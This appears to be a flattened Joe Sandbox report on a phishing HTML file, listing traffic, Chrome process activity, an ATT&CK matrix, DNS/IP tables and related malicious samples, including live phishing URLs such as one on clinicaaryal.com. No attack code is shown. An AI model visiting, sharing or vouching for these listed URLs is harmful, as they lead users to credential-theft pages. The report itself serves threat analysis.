        Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49959 version: TLS 1.2
        Source: classification engineClassification label: mal60.phis.winHTML@44/344@34/9
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,11314457020440692918,918802598035399171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1892,i,752861697827379664,18182631419507974909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1668 --field-trial-handle=1908,i,11277362346978830848,2288916482173699975,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,11314457020440692918,918802598035399171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1892,i,752861697827379664,18182631419507974909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1668 --field-trial-handle=1908,i,11277362346978830848,2288916482173699975,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Google Drive.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://login.microsoftonline.com0%URL Reputationsafe
        http://feross.org0%URL Reputationsafe
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          unknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            unknown
            clinicaaryal.com
            192.243.110.5
            truefalse
              unknown
              www.google.com
              142.250.186.164
              truefalse
                unknown
                login.microsoftonline.com
                unknown
                unknownfalse
                  unknown
                  aefd.nelreports.net
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://clinicaaryal.com/wp-admin/maint/404.phptrue
                      unknown
                      file:///C:/Users/user/Desktop/Derickdermatology.htmltrue
                        unknown
                        https://clinicaaryal.com/wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initialtrue
                          unknown
                          https://clinicaaryal.com/favicon.icofalse
                            unknown
                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.texasassessment.govchromecache_253.3.drfalse
                              unknown
                              https://github.com/zloirock/core-jschromecache_248.3.dr, chromecache_259.3.drfalse
                                unknown
                                http://ww.w3.org/1999/02/22-rdf-syntax-ns#chromecache_359.3.dr, chromecache_314.3.drfalse
                                  unknown
                                  https://www.niche.comchromecache_253.3.drfalse
                                    unknown
                                    https://accenturelearning.tekstac.com/login/forgot_password.phpchromecache_253.3.drfalse
                                      unknown
                                      https://www.testac4ate.com/challenge-page/0ddc7004-be9f-4ebd-a396-fb532a35de1bchromecache_253.3.drfalse
                                        unknown
                                        https://app.testrac.comchromecache_253.3.drfalse
                                          unknown
                                          https://login.chinacloudapi.cnchromecache_336.3.dr, chromecache_383.3.drfalse
                                            unknown
                                            https://login.windows-ppe.netchromecache_336.3.dr, chromecache_383.3.drfalse
                                              unknown
                                              https://cognizant.tekstac.com/login/forgot_password.phpchromecache_253.3.drfalse
                                                unknown
                                                https://ezgif.com/effectschromecache_314.3.drfalse
                                                  unknown
                                                  https://www.niche.com/colleges/texas-state-technical-college/chromecache_253.3.drfalse
                                                    unknown
                                                    https://www.testac4ate.com/chromecache_253.3.drfalse
                                                      unknown
                                                      https://login.microsoftonline.uschromecache_336.3.dr, chromecache_383.3.drfalse
                                                        unknown
                                                        https://www.testac4ate.comchromecache_253.3.drfalse
                                                          unknown
                                                          https://login.microsoftonline.comchromecache_336.3.dr, chromecache_383.3.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://app.testrac.com/chromecache_253.3.drfalse
                                                            unknown
                                                            https://notification.api.microsoftapp.net/user/injection/v1/chromecache_301.3.dr, chromecache_355.3.drfalse
                                                              unknown
                                                              https://www.tekstac.com/chromecache_253.3.drfalse
                                                                unknown
                                                                https://www.ciol.com/maveric-systems-unveils-testac/chromecache_253.3.drfalse
                                                                  unknown
                                                                  https://www.ciol.comchromecache_253.3.drfalse
                                                                    unknown
                                                                    https://www.texasassessment.gov/families.htmlchromecache_253.3.drfalse
                                                                      unknown
                                                                      https://accenturelearning.tekstac.com/login/index.phpchromecache_253.3.drfalse
                                                                        unknown
                                                                        https://www.testac4ate.com/challengeschromecache_253.3.drfalse
                                                                          unknown
                                                                          http://feross.orgchromecache_270.3.dr, chromecache_229.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://accenturelearning.tekstac.comchromecache_253.3.drfalse
                                                                            unknown
                                                                            https://github.com/zloirock/core-js/blob/v3.37.1/LICENSEchromecache_248.3.dr, chromecache_259.3.drfalse
                                                                              unknown
                                                                              https://www.tekstac.comchromecache_253.3.drfalse
                                                                                unknown
                                                                                https://login.microsoftonline.dechromecache_336.3.dr, chromecache_383.3.drfalse
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  13.107.246.45
                                                                                  s-part-0017.t-0009.t-msedge.netUnited States
                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                  142.250.184.228
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.17.24.14
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.250.186.36
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  239.255.255.250
                                                                                  unknownReserved
                                                                                  unknownunknownfalse
                                                                                  192.243.110.5
                                                                                  clinicaaryal.comUnited States
                                                                                  31463FOURD-ASGBfalse
                                                                                  142.250.186.164
                                                                                  www.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.17.25.14
                                                                                  cdnjs.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  IP
                                                                                  192.168.2.16
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1545553
                                                                                  Start date and time:2024-10-30 17:12:13 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 4m 31s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:18
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Derickdermatology.html
                                                                                  Detection:MAL
                                                                                  Classification:mal60.phis.winHTML@44/344@34/9
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .html
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.185.78, 74.125.206.84, 34.104.35.123, 13.74.129.92, 2.23.209.131, 2.23.209.187, 2.23.209.141, 2.23.209.133, 2.23.209.140, 2.23.209.135, 2.23.209.132, 2.23.209.142, 2.23.209.189, 2.23.209.160, 2.23.209.183, 2.23.209.176, 2.23.209.179, 2.23.209.181, 2.23.209.177, 2.23.209.175, 2.23.209.182, 2.23.209.158, 2.23.209.154, 2.23.209.150, 2.23.209.167, 2.23.209.156, 2.23.209.162, 2.23.209.166, 2.23.209.161, 2.23.209.178, 2.23.209.168, 2.23.209.173, 2.23.209.143, 2.23.209.149, 2.23.209.185, 2.23.209.186, 88.221.110.211, 88.221.110.243, 216.58.212.142, 64.233.184.84, 216.58.206.35, 2.23.209.130, 2.23.209.144, 2.23.209.148, 142.250.186.131, 142.250.186.142, 74.125.133.84, 20.190.159.73, 20.190.159.2, 20.190.159.68, 20.190.159.23, 40.126.31.71, 20.190.159.71, 40.126.31.69, 20.190.159.4, 40.126.32.76, 20.190.160.14, 40.126.32.133, 20.190.160.22, 20.190.160.20, 40.126.32.68, 40.126.32.138, 20.190.160.17, 204.79.197.200, 13.107.21.200, 142.250.186.99
                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, p-static.bing.trafficmanager.net, aefd.nelreports.net.akamaized.net, ak.privatelink.msidentity.com, g-msn-com-nsatc.trafficmanager.net, r.g.bing.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, th.bing.com, r.bing.com, www-bing-com.dual-a-0001.a-msedge.net, update.googleapis.com, 3pcookiecheck.azureedge.net, 3pcookiecheck.afd.azureedge.net, login.mso.msidentity.com, www.bing.com, www.tm.ak.prd.aadg.trafficmanager.net, www2.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, th.bing.com.edgekey.net, aadcdnoriginwus2.azureedge.net, dual-a-0001.a-msedge.net, r.bing.com.edgekey.net, www.tm.v4.a.prd.aadg.akadns.net, p-th.bing.com.trafficmanager.net, aadcdn.msauth.net, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, a1851.dscg2.aka
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: Derickdermatology.html
                                                                                  No simulations
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                                                  • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                                                  http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                                                  • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                                                  http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                                                  • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                                                  239.255.255.250https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                    Complete with Docusign_ Remittance Advice .pdf(1).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                      https://cosiosos.com.de/7i2ko/Get hashmaliciousHTMLPhisherBrowse
                                                                                        https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                          https://zastromts.za.com/v3oX/#EGet hashmaliciousHTMLPhisherBrowse
                                                                                            http://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                                                              Receipt.htmGet hashmaliciousUnknownBrowse
                                                                                                weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                      13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • nam.dcv.ms/BxPVLH2cz4
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      cdnjs.cloudflare.comComplete with Docusign_ Remittance Advice .pdf(1).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.24.14
                                                                                                      https://cosiosos.com.de/7i2ko/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.24.14
                                                                                                      https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      https://zastromts.za.com/v3oX/#EGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.24.14
                                                                                                      Receipt.htmGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.24.14
                                                                                                      weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                      • 104.17.24.14
                                                                                                      weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                      • 104.17.24.14
                                                                                                      https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                                                                      • 104.17.25.14
                                                                                                      https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                                                                      • 104.17.24.14
                                                                                                      Review_&_Aprove_Your_Next_Payroll84633.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.24.14
                                                                                                      s-part-0017.t-0009.t-msedge.nethttps://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                      • 13.107.246.45
                                                                                                      Receipt.htmGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                      • 13.107.246.45
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://www.guidedtrack.com/programs/n5snx1a/runGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamicsGet hashmaliciousUnknownBrowse
